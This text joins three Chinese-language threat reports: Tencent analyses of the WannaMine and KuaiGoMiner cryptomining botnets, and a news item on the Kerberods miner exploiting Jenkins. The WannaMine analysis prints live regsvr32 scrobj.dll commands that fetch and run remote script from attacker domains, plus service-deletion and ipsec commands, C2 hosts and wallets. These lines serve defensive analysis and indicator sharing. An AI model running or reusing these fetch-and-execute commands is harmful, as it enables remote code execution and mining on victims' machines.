感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新，WannaMine最早于2017年底被发现，主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性，会采用多种手法清理、阻止竞争木马的挖矿行为，同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点： 利用“永恒之蓝”漏洞攻击传播； 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动； 通过添加IP策略阻止本机连接对手木马的47个矿池，阻止其他病毒通过“永恒之蓝”漏洞入侵； 添加计划任务，WMI事件消费者进行持久化攻击，删除“MyKings”病毒的WMI后门； 利用COM组件注册程序regsvr32执行恶意脚本； 利用WMIClass存取恶意代码； 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化，计划任务名：’Microsoft\Windows\MUI\LMRemove’， ‘Microsoft\Windows\Multimedia\SystemEventService’，执行以下命令： regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序，用于在Windows系统上注册和注销对象链接和嵌入控件，包括动态链接库（DLL），Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理，因此可以通过在调用期间将统一资源定位符（URL）作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时，恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述，其中被嵌入了一段JScript脚本，功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下： 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本，也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ，$fffffff，$ssssssss来分别保存加密数据，然后继续执行，后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头，这段字符在Powershell的混淆代码中较为常见，功能等同于Powershell命令中的“IEX”（Invoke-Expression），IEX用于将字符串作为命令执行，当去掉IEX后，执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”，即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码，包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门，以及属于未知团伙的“BotFilter82“，“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者，其中事件过滤器名$filterName = (‘Windows Events Filter’)，事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”，达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化： 旧版： 备用服务器地址：profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址：172.247.116.8 默认端口：8000 核心Powershell：in6.ps1,in3.ps1 新版： 备用服务器地址：safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址：skt.xiaojiji.nl 默认端口：80 核心Powershell：network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象，将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手，杀死进程命令行包含字符“System_Anti_Virus_Core “，”cryptonight “的进程，同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码，攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址，取A段和B段作为IP地址开头，然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口，在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码，得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击，利用WMI的远程命令执行功能，调用Invoke-WmiMethod执行远程Powershell命令（64位执行 http[:]//safe.dashabi.nl/networks.ps1，32位执行http[:]//safe.dashabi.nl/netstat.ps1）。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描，将存在漏洞的IP保存至$i17中，然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc，该命令内容由之前的三个变量之一$ssssssss中解密得到，主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象，如果是则执行远程恶意代码：http[:]//207.246.124.125/networks.ps1 RunDDOS（Gh0st远控木马） Networks.ps1中解码出$fffffff后，调用其函数RunDDOS ，指定参数”cohernece.exe”，从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据，并还原成PE文件cohernece.exe到%Temp%目录下，通过start-process命令执行。 分析发现，该文件当前并非DDOS木马，而是Gh0st远控木马，当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见，技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后，调用其函数RunXMR，指定参数”steam.exe”，从http[:]//safe.dashabi.nl/steam.txt下载二进制数据，并还原成PE文件steam.exe到%Temp%目录下，通过start-process命令执行。steam.exe为自解压程序，解压目录为c:\windows\fonts\Wbems\，解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务： sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性： attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe，该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec，将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器，阻止本机向其他47个矿池IP地址发起的TCP网络连接，从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信，包括局域网和远程连接，从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性，并在该注册表下写入StartExe值，利用微软”The Ease of Access Center”（便捷访问中心）特性来启动木马uas.exe。 然后通过服务管理程序msdtc，将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下： DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译，支持CPU和NVIDIA CUDA显卡GPU挖矿（4.5.0以后）。 使用以下矿池： xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包： 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点，我们建议企业采取以下措施加以防范： 使用安全的密码策略，切勿使用弱口令； 及时修复Windows系统漏洞，推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞，亦可参考以下链接重点修复永恒之蓝相关漏洞；（1）MS17-010永恒之蓝漏洞补丁下载地址：（2）XP、WindowsServer2003、win8等系统访问：http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598（3）Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口，如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的指定IP连接登陆； 对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器； 当系统出现异常时，检查计划任务和WMI（可用WMITools.exe）中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接： WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃，14万台linux系统受攻击

感谢腾讯御见威胁情报中心来稿！ 原文：https://s.tencent.com/research/report/824.html 腾讯安全御见威胁情报中心检测到“快Go矿工”（KuaiGoMiner）挖矿木马攻击。该木马利用NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”攻击工具针对互联网上的机器进行扫描攻击，并在攻击成功后植入挖矿和远控木马，已控制数万台电脑。 一、背景 腾讯安全御见威胁情报中心检测到“快Go矿工”（KuaiGoMiner）挖矿木马攻击。该木马利用NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”攻击工具针对互联网上的机器进行扫描攻击，并在攻击成功后植入挖矿和远控木马，已控制数万台电脑。因其使用的C2域名中包含“kuai-Go”，御见威胁情报中心将其命名为“快Go矿工”（KuaiGoMiner）。 “快Go矿工”（KuaiGoMiner）将挖矿程序伪装成系统进程explorer.exe、smss.exe运行，截止目前已挖矿获得门罗币242.7个，折合人民币9万余元。同时，病毒在攻陷机器上植入的gh0st远控木马，具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能，中毒电脑会面临机密信息泄露的风险。 据腾讯御见威胁情报中心统计数据，在微软发布“永恒之蓝”相关漏洞补丁过去两年多之后，仍有约30%用户未修复“永恒之蓝”漏洞(MS17-010)，这导致利用该漏洞攻击的病毒始终层出不穷。“快Go矿工” (KuaiGoMiner)分布在全国各地，受害最严重地区为广东、江苏、河南、北京。 从“快Go矿工” (KuaiGoMiner)影响的行业来看，主要为IT行业、制造业、科研和技术服务业。 二、详细分析 漏洞攻击 “快Go矿工” (KuaiGoMiner)在攻陷的系统下载攻击模块，释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具，释放到C:\Windows\Fonts\cd\目录下。 开始攻击后依次启动脚本go.vbs->rme.bat->cmd.bat，并在cmd.bat中完成机器出口IP查询、随机IP地址生成，然后通过分别针对局域网IP地址和外网随机IP地址进行445/139端口扫描。 最后在load.bat和loab.bat中针对开放445/139端口的机器进行永恒之蓝漏洞攻击。攻击成功后在目标机器执行Payload，将Doublepulsar.dll注入lsass.exe执行，将Eternalblue.dll注入explorer.exe执行。 Doublepulsar.dll或Eternalblue.dll执行后在目标机器下载m.exe或n.exe，保存至C:\safe.exe并启动，开始新一轮的感染和攻击。 挖矿 “快Go矿工”（KuaiGoMiner）下载释放挖矿模块文件到C:\Windows\Fonts\data\目录下。其中smss.exe为32位矿机程序，explorer.exe为64位矿机程序，Services.exe为Windows服务安装工具NSSM。 通过user.vbs启动user.bat。并在user.bat中删除计划任务”Flash_Update”、”Update”、”Update_windows”，删除旧服务和计划任务“Microsoft_Update”。之后判断系统版本，利用NSSM(services.exe)分别将smss.exe和explorer.exe安装服务至32位和64位系统上，使用的服务名称为“Microsoft_Update”。 矿机采用开源挖矿程序XMRig编译，挖矿使用矿池地址：xmr-eu1.nanopool.org:14444， 钱包地址： 43uXVJimpGpcoftfAfM9AGAdHwnvuSK14Uy4wVGgJB968L6M3eXn8pgFpgNSLrbpgW8Xo5bBgHxAEMxPug8knokALBrLsV4 查询矿池目前挖矿获得收益为242.7个XMR，折合人民币约91000元。 远程控制 “快Go矿工”（KuaiGoMiner）释放经gh0st修改而成的远控木马到目录 C:\Users\[User]\AppData\Local\Temp\<random>.dll下。 连接C2地址fwq.kuai-go.com:12353，根据服务器返回的指令完成搜集系统信息、上传下载文件、删除系统记录、查看系统服务、运行和退出程序、远程桌面登陆、键盘记录等远程功能。 三、安全建议 1、 快Go矿工（KuaiGoMiner）手动清除方法： 删除目录 C:\Windows\Fonts\cd\ C:\Windows\Fonts\cd\data\ 删除文件 C:\Users\[User]\AppData\Local\Temp\<random>.dll 删除计划任务“Microsoft_Update” (执行文件路径C:\Windows\Fonts\cd\data\explorer.exe 或C:\Windows\Fonts\cd\data\smss.exe) 2、针对MS010-17 “永恒之蓝”漏洞的防御： 服务器暂时关闭不必要的端口（如135、139、445），方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html 下载并更新Windows系统补丁，及时修复永恒之蓝系列漏洞： XP、Windows Server 2003、win8等系统访问：http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows 10,Windows Server 2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 3、 建议企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击。 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs MD5 339bec2b3e598b98218c16ed1e762b2a 57bd72d6dc95ff57b5321a62b9f7cde2 57003ef2a67c70f8959345f342536aa5 15d2c95fe9fe4134064e9a4f49d63cf1 20010658d789192eb69499bc5c1c9f11 546a5c41ec285686c9c082994ef193f5 830f8e648d2a7da4d512b384e29e9453 8bcf9ba698b20a6fb2fef348b8c55b1d c17f7c9c9265c4f8007d6def58174144 6dc336b2b1b4e8d5c8c5959c37b2729d 3e6c981f627122df8b428aac35cb586e 222d8a0986b8012d80edbecdc5c48714 532a0904faff2a3a8c79594c9df99320 IP 110.157.232.117 104.233.201.209 Domain w.zhzy999.net images.kuai-go.com update.kuai-go.com wx.kuai-go.com sex.kuai-go.com usa.kuai-go.com korea.kuai-go.com der.kuai-go.com fwq.kuai-go.com URL http[:]//w.zhzy999.net/images/m.exe http[:]//3.zhzy999.net/images/n.exe http[:]//images.kuai-go.com/images/logo.gif http[:]//der.kuai-go.com/img/1.rar http[:]//der.kuai-go.com/img/2.rar http[:]//110.157.232.117/images/m.exe http[:]//110.157.232.117/images/n.exe http[:]//110.157.232.117/img/1.rar http[:]//110.157.232.117/img/2.rar http[:]//110.157.232.117/img/3.rar 钱包 43uXVJimpGpcoftfAfM9AGAdHwnvuSK14Uy4wVGgJB968L6M3eXn8pgFpgNSLrbpgW8Xo5bBgHxAEMxPug8knokALBrLsV4

HackerNews.cc 5 月 9日消息，黑客正利用2018年揭露的Jenkins漏洞（CVE-2018-1000861 ）来进行挖矿活动。 Jenkins是最受欢迎的开源自动化服务器，它由CloudBees和Jenkins社区共同维护。 它在全球拥有数十万个活动安装，拥有超过100万用户。 SANS专家Renato Marinho发现了一个针对易受攻击的Apache Jenkins安装的恶意攻击活动，来传播一个名为Kerberods的门罗币挖矿恶意软件。据SANS研究所的网络风暴中心称，攻击者正在利用Jenkins服务器的CVE-2018-1000861漏洞，其存在于Stapler HTTP请求处理引擎中。 Marinho发现一些攻击击中了他的一个蜜罐，且正试图利用Jenkins漏洞来进行挖矿。在分析了这一蜜罐威胁之后，他创建了下图所示的图表（可以按照蓝色数字来理解每一步）。 Kerberods包含自定义版本的UPX打包程序，它尝试获取root权限以隐藏其存在来长期存续。在分析二进制文件后，Marinho发现使用的打包程序是“UPX”的自定义版本。UPX是一个开源软件，有许多方法可以修改UPX，使得用常规UPX版本解压缩文件很难。幸运的是，在本例中，UPX自定义版本只涉及魔术常量UPX_MAGIC_LE32从“UPX”修改为其他三个字母。因此，将二进制文件的不同部分还原为UPX，可以使用常规版本的UPX解压缩二进制文件。 一旦获得root权限，Kerberods会将一个库加载到操作系统中，该操作系统挂钩Glibc的不同功能，就像一个木马一样。在没有root权限的情况下，恶意软件创建了一个定时任务来确保其持久性。 Kerberods在受感染的系统上下载并执行门罗币加密货币挖掘器，它还使用本地SSH密钥进行横向移动。 恶意软件还会在互联网上搜索其他易受攻击的Jenkins服务器。   消息来源：Securityaffairs， 译者：Vill，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接